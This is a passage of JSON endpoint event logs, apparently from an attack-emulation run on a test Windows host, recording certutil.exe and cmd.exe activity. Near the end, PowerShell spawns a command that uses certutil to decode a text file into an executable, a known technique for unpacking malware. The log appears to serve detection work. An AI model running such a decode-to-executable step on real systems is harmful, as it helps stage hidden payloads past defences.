"event_type": "image_load", - "image_name": "secur32.dll", - "image_path": "C:\\Windows\\System32\\secur32.dll", - "pid": 904, - 
"process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499800000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "samcli.dll", - "image_path": "C:\\Windows\\System32\\samcli.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499800000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "dsrole.dll", - "image_path": "C:\\Windows\\System32\\dsrole.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499800000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499800000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "logoncli.dll", - "image_path": "C:\\Windows\\System32\\logoncli.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499800000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499800000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": 
"C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499800000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499950016, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "dwmapi.dll", - "image_path": "C:\\Windows\\System32\\dwmapi.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - 
"process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": 
"{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "process", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "subtype": "terminate", - "timestamp": 131883573500110000, - "unique_pid": 
"{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573500110000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"image_load", - "image_name": "msctf.dll", - "image_path": "C:\\Windows\\System32\\msctf.dll", - "pid": 904, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573499950016, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" - }, - { - "event_type": "process", - "pid": 204, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573500110000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" - }, - { - "event_type": "file", - "file_name": "CERTUTIL.EXE-CB7805D7.pf", - "file_path": "C:\\Windows\\Prefetch\\CERTUTIL.EXE-CB7805D7.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573500270000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"certutil.exe -decode file.txt c:\\file.exe\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4760, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573500330016, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573500270000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4760, - 
"process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573500270000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573500270000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573500270000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573500270000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" - }, - { - "command_line": "certutil.exe -decode file.txt c:\\file.exe", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1688, - "ppid": 4760, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "subtype": "create", - "timestamp": 131883573500410000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}", - "unique_ppid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "certutil.exe", - "image_path": "C:\\Windows\\System32\\certutil.exe", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500420000, - "unique_pid": 
"{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500420000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500420000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500420000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500420000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500420000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500420000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - 
